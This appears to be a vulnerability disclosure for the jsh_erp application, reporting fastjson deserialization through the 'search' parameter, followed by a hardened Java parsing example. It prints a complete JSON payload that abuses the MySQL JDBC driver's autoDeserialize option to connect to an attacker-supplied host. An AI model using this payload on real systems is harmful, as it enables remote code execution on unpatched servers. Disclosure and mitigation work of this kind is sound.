jsh_erp

The vulnerability lies in the use of parseObject(search).

The search parameter is controllable, allowing for a deserialization attack.

The payload used in the search parameter is as follows:

```json
{
  "name": {
    "@type": "com.mysql.jdbc.JDBC4Connection",
    "databaseToConnectTo": "dbname",
    "hostToConnectTo": "xxx.xxx.xxx.xxx",
    "info": {
      "NUM_HOSTS": "1",
      "autoDeserialize": "true",
      "password": "pass",
      "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
      "user": "username"
    },
    "portToConnectTo": 3308,
    "url": ""
  }
}
```
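
A hardened way to read one key from the search parameter, next to the parseObject(search) pattern described above. This is an added example, not jsh_erp's own code: it assumes fastjson 1.2.68 or later (where `ParserConfig.setSafeMode` exists), and the names `SearchParam`, `getInfoUnsafe` and `getInfoSafe` are hypothetical.

```java
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.parser.ParserConfig;

public class SearchParam {
    // Private config: safeMode here cannot be switched off by code that
    // changes ParserConfig.getGlobalInstance().
    private static final ParserConfig SAFE = new ParserConfig();
    static {
        SAFE.setSafeMode(true); // every "@type" key now raises JSONException
    }

    // The pattern the page reports: request text goes straight into parseObject.
    static String getInfoUnsafe(String search, String key) {
        return JSON.parseObject(search).getString(key);
    }

    // Hardened: safeMode parser, and only scalar filter values are returned.
    static String getInfoSafe(String search, String key) {
        JSONObject obj;
        try {
            obj = JSON.parseObject(search, JSONObject.class, SAFE);
        } catch (JSONException e) {
            throw new IllegalArgumentException("rejected search parameter", e);
        }
        Object v = (obj == null) ? null : obj.get(key);
        if (v == null) return null;
        if (v instanceof String || v instanceof Number || v instanceof Boolean) {
            return v.toString();
        }
        throw new IllegalArgumentException("search." + key + " must be a scalar");
    }

    public static void main(String[] args) {
        // Constructed inputs: an ordinary filter, then one carrying a type hint.
        String normal = "{\"name\":\"widget\",\"status\":1}";
        String typed = "{\"name\":{\"@type\":\"example.NotARealClass\"}}";
        System.out.println(getInfoSafe(normal, "name"));
        try {
            getInfoSafe(typed, "name");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Rejecting non-scalar values is a second layer: search filters of this kind are flat key/value pairs, so a nested object under a key is refused even if type handling is ever re-enabled.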